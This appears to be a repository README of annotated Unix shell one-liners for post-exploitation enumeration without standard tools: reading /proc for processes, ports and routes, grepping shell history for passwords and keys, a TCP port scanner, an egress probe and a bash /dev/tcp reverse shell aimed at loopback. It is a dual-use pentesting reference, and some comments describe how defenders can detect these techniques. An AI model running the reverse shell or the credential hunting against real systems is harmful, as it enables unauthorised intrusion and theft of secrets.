An lcdbin is a lowest-common-denominator binary: one which, with rare exceptions, should be present on any UNIX-based operating system. This repository is a collection of oneliners that use lcdbins to perform enumeration and post-exploitation activities for which you would normally use other tools, such as id, netstat or python. Use them when you find yourself in a stripped-down environment where the usual tools aren't available.
Here is a list of the binaries used by the oneliners in this repository:
- awk
- bc
- cat
- echo
- grep
- ls
- printf
- read
- sed
- sort
Where possible, alternatives have been provided in case a particular binary is unavailable on your system; note that many of the commands below rely on a mounted procfs (/proc) and will not work where it is absent. Greetz to moogz for assistance and contributions.
Get kernel version information
# Kernel identification from procfs. /proc/version is the full banner ("Linux version ..." plus
# compiler and build string); /proc/sys/kernel/version holds only the build string (what `uname -v` prints).
cat /proc/version
cat /proc/sys/kernel/version
Get hostname
# Hostname of the UTS namespace the shell runs in (equivalent to `hostname`); inside a container
# this is the container's name, not the host's.
cat /proc/sys/kernel/hostname
Get current uid and gid
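# Real UID and GID of the current process, read from its own status file (equivalent to `id -u` / `id -g`).
# The "Uid:"/"Gid:" lines carry four values (real, effective, saved, filesystem); field 2 is the real id,
# so under setuid/setgid the effective id can differ — fields 3-5 hold the rest if that matters.
# awk reads the file directly instead of through a cat pipe; the label comparison is case-insensitive.
uid=$(awk -F'[ \t]' 'tolower($1) == "uid:" { print $2 }' /proc/self/status); gid=$(awk -F'[ \t]' 'tolower($1) == "gid:" { print $2 }' /proc/self/status); printf 'uid %s gid %s\n' "$uid" "$gid"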
Get group membership for uid
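# Group membership for a numeric uid (what `id -Gn` / `groups` would show), from /etc/passwd and /etc/group.
# uid defaults to 1000 unless already set. A group is printed when it is the user's primary group (gid from
# passwd), is named after the user, or lists the user in its comma-separated member field — an exact field
# match. The original `grep $user /etc/group` matched substrings ("bob" inside "bobby") and, when the uid had
# no passwd entry, ran grep with an empty pattern and read stdin forever; an unknown uid now reports to stderr.
uid=${uid:-1000}; user=$(awk -F: -v x="$uid" '$3 == x { print $1; exit }' /etc/passwd); pgid=$(awk -F: -v x="$uid" '$3 == x { print $4; exit }' /etc/passwd); if [ -n "$user" ]; then awk -F: -v u="$user" -v g="$pgid" '{ if ($1 == u || $3 == g) { print; next } n = split($4, m, ","); for (i = 1; i <= n; i++) if (m[i] == u) { print; next } }' /etc/group; else printf 'no /etc/passwd entry for uid %s\n' "$uid" >&2; fi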
List environment variables
# Environment variables, taken from the environ the sed process was started with — i.e. what the shell
# exports, not its unexported variables. Entries are NUL-separated, so each NUL becomes a newline; the \x0
# escape is a GNU/busybox sed extension (POSIX sed has no hex escapes). Environments frequently carry
# tokens and passwords, so treat the output as sensitive.
sed 's/\x0/\n/g' /proc/self/environ
List information about processes
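# Process table (PID, command name, real UID, real GID) from /proc — a `ps -eo pid,comm,uid,gid` substitute.
# Numeric /proc entries are taken by glob instead of parsing `ls`; each status file is read once (the original
# opened it three times per process); processes that exit between the glob and the read are skipped instead
# of printing a bare pid. Field 2 of "Uid:"/"Gid:" is the real id. The single-character field separator
# truncates the command name at its first blank, as before. The here-string `<<<` is bash-specific.
echo PID NAME UID GID; for d in /proc/[0-9]*; do pid=${d#/proc/}; read -r name uid gid <<<"$(awk -F'[ \t]' 'tolower($1) == "name:" { n = $2 } tolower($1) == "uid:" { u = $2 } tolower($1) == "gid:" { g = $2 } END { if (n != "") print n, u, g }' "$d/status" 2>/dev/null)"; [ -n "$gid" ] || continue; echo "$pid $name $uid $gid"; done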
List mounted filesystems
# Mounted filesystems as seen from this process's mount namespace (equivalent to `mount` with no arguments;
# /proc/mounts is normally a symlink to this file). In a container or chroot only the mounts visible from
# that namespace are listed.
cat /proc/self/mounts
Find a filename without the find command
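# Locate files by name without find(1): walk `ls -R` output and rebuild full paths. In `ls -R` output a line
# ending in ":" is a directory header and the non-blank lines after it are that directory's entries; awk
# joins them into "dir/entry" and grep filters on the pattern (a basic regex, matched against the whole
# path, so directory components match too). The original's first awk rule was a no-op — every ":" line
# already resets the directory — and is dropped. Inherent ls-parsing caveats: names containing newlines,
# or ending in ":", are misread. root and pattern default to /etc and passwd unless already set.
root=${root:-/etc}; pattern=${pattern:-passwd}; ls -R -- "$root" 2>/dev/null | awk '/:$/ { sub(/:$/, ""); dir = $0; seen = 1; next } seen && NF { print dir "/" $0 }' | grep -- "$pattern"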
Search HISTFILE for credentials
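# Grep the shell history file for credential-related keywords, one grep pass per keyword (a line holding
# several keywords is printed more than once, as before). HISTFILE is normally only set in interactive
# shells; without the fallback and the readability check, an empty HISTFILE made `grep -i sql` read stdin
# and block. Arrays and "${x[@]}" are bash features, not lcdbins.
x=(sql smbclient key pass user); hist=${HISTFILE:-$HOME/.bash_history}; if [ -r "$hist" ]; then for i in "${x[@]}"; do grep -i -- "$i" "$hist"; done; else printf 'history file not readable: %s\n' "$hist" >&2; fi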
Get local network interface addresses from /proc/net/fib_trie
# Local (/32 "host") IPv4 addresses from the kernel's FIB dump — an `ip -4 addr` substitute.
# In /proc/net/fib_trie the address line comes before the line carrying "32 host", so the previous
# line's second field is remembered and printed when the marker appears; sort -u removes the
# duplicates the file contains (it lists more than one table).
awk '{ if ($0 ~ /32 host/) print prev; prev = $2 }' /proc/net/fib_trie | sort -u
Parse listening TCP ports on /proc/net/tcp
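# Listening TCP ports (state 0A = TCP_LISTEN) from procfs — a `netstat -lnt` / `ss -lnt` substitute.
# Fields are split on runs of spaces/colons, so the local port is hex field 4 and the socket state field 7;
# selecting on the state field instead of grepping " 0A " anywhere in the line avoids false hits.
# /proc/net/tcp6 is included so IPv6-only listeners (a daemon bound to ::) are not missed; cat tolerates a
# missing tcp6 file. Two hex-to-decimal variants: bash's builtin printf, or bc (ibase=16 needs the
# uppercase hex procfs already uses). Only the current network namespace is visible.
cat /proc/net/tcp /proc/net/tcp6 2>/dev/null | awk -F '[ :]+' '$7 == "0A" { print $4 }' | while read -r hexport; do printf '%d\n' "0x$hexport"; done | sort -un
cat /proc/net/tcp /proc/net/tcp6 2>/dev/null | awk -F '[ :]+' '$7 == "0A" { print $4 }' | while read -r hexport; do echo "obase=10; ibase=16; $hexport" | bc; done | sort -un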
Parse listening UDP ports on /proc/net/udp
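# Bound UDP ports from procfs — a `netstat -lnu` substitute. UDP has no listen state, so every socket row
# is listed, including sockets connected to a peer (non-zero rem_address in field 5), as in the original.
# The header is dropped by requiring field 4 to be hex rather than by line number, which also lets
# /proc/net/udp6 be appended (cat tolerates its absence). Two hex-to-decimal variants: bash printf, or bc.
cat /proc/net/udp /proc/net/udp6 2>/dev/null | awk -F '[ :]+' '$4 ~ /^[0-9A-F]+$/ { print $4 }' | while read -r hexport; do printf '%d\n' "0x$hexport"; done | sort -un
cat /proc/net/udp /proc/net/udp6 2>/dev/null | awk -F '[ :]+' '$4 ~ /^[0-9A-F]+$/ { print $4 }' | while read -r hexport; do echo "obase=10; ibase=16; $hexport" | bc; done | sort -un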
Parse destination and gateway from /proc/net/route
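# Kernel IPv4 routing table from procfs — a `route -n` / `ip route` substitute.
# /proc/net/route stores Destination and Gateway as 8 hex digits in little-endian byte order, so the
# dotted quad is the byte pairs read from the right. One awk pass does the conversion with a nibble lookup
# (POSIX awk has no strtonum); the original spawned awk and sed several times per row. The program is
# kept in route_awk so it can be exercised on sample input. Rows are printed regardless of the Flags column,
# as before, so routes that are not up appear too; Mask is field 8 if a CIDR view is needed.
echo Interface Destination Gateway; route_awk='function hexbyte(h,  hi, lo) { hi = index("0123456789ABCDEF", toupper(substr(h, 1, 1))) - 1; lo = index("0123456789ABCDEF", toupper(substr(h, 2, 1))) - 1; return hi * 16 + lo } function hex2ip(h) { return hexbyte(substr(h, 7, 2)) "." hexbyte(substr(h, 5, 2)) "." hexbyte(substr(h, 3, 2)) "." hexbyte(substr(h, 1, 2)) } NR > 1 && NF >= 3 { print $1, hex2ip($2), hex2ip($3) }'; awk "$route_awk" /proc/net/route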
Print the ARP table
# IPv4 neighbour (ARP) cache of the current network namespace — an `arp -n` / `ip neigh` substitute.
# Columns are IP address, HW type, Flags, HW address, Mask and Device; the Flags column separates
# resolved entries from incomplete ones.
cat /proc/net/arp
Connect to a port and execute the commands received (reverse shell)
# Reverse shell: fd 3 becomes a TCP connection to host:port (loopback here); whatever arrives on it is piped
# into sh and sh's stdout is written back to the socket (stderr stays on the terminal). Not an lcdbin
# technique: /dev/tcp is a bash redirection feature that dash and busybox sh do not have. On the defending
# side the tell-tale is a shell whose stdin/stdout are a socket instead of a tty, together with a
# long-lived outbound connection owned by a shell process — both are straightforward to alert on.
exec 3<>/dev/tcp/127.0.0.1/31337; cat <&3 | sh >&3
Use letmeoutofyour.net to check firewall ACLs for a port
# Egress check: open a TCP connection to the test service on the given port and look for its w00tw00t
# banner; a hit means outbound traffic to that port passes the surrounding ACLs. Caveats: /dev/tcp and
# `echo -e` are bash behaviours, not lcdbins (dash's echo prints "-e" literally); cat blocks until the
# remote side closes; `exec` leaves fd 3 open in the shell, and in a non-interactive shell a failed
# connect terminates the shell outright rather than just failing the command.
exec 3<>/dev/tcp/letmeoutofyour.net/31337; echo -e "GET / HTTP/1.0\r\n\r\n" >&3; cat <&3 | grep w00tw00t
Use dyndns.org to find your public IP address
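# Public (NATed) IPv4 address via checkip.dyndns.org over plain HTTP, using bash's /dev/tcp (not an lcdbin
# feature; dash and busybox sh lack it). The socket is attached to fd 3 only for the braced group, so it is
# closed afterwards and a failed connect merely reports an error — with `exec`, a redirection failure also
# terminates a non-interactive shell and a successful one leaves a stray fd on the shell. printf replaces
# the non-portable `echo -e`, and a Host header is sent in case the service is virtual-hosted. The output
# is the server's raw HTML response, so the address still has to be picked out of it.
{ printf 'GET / HTTP/1.0\r\nHost: checkip.dyndns.org\r\n\r\n' >&3; cat <&3; } 3<>/dev/tcp/checkip.dyndns.org/80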
Scan TCP ports
# Sequential TCP connect scan of ports 1-9000 on SERVER: opening /dev/tcp/host/port performs the connect(),
# and only a successful open prints. Bash-specific throughout ({1..9000}, /dev/tcp, &>). SERVER is
# loop-invariant and belongs before the loop; PORT is merely an alias for $i. There is no timeout, so a
# filtered port stalls the loop for the kernel's connect timeout. Every iteration is a full connect(), so
# the scan shows up as thousands of connection attempts from one source in any flow log or IDS.
for i in {1..9000}; do SERVER="127.0.0.1"; PORT=$i; (echo > /dev/tcp/$SERVER/$PORT) &> /dev/null && echo "Port $PORT seems to be open"; done
Get all IP addresses in a directory
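# Harvest IPv4-looking strings from a directory tree (default /etc). Two passes: a loose basic-regex match
# (any four 1-3 digit groups, so 999.999.999.999 qualifies) and a strict extended-regex match limited to
# 0-255 octets. The original strict pattern ended every octet with (\.|$), which only matched addresses at
# the end of a line or followed by another dot; here the three trailing octets are anchored on the dot
# alone, so 192.168.1.1 in the middle of a line is found. grep -r is pointed at the directory itself (the
# /etc/* glob skipped dotfiles); read errors are discarded. \b is a GNU grep extension.
dir=${dir:-/etc}; loose_re='[0-9]\{1,3\}\(\.[0-9]\{1,3\}\)\{3\}'; ipv4_re='\b(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)(\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)){3}\b'
grep -ro -- "$loose_re" "$dir" 2>/dev/null
grep -Ero -- "$ipv4_re" "$dir" 2>/dev/null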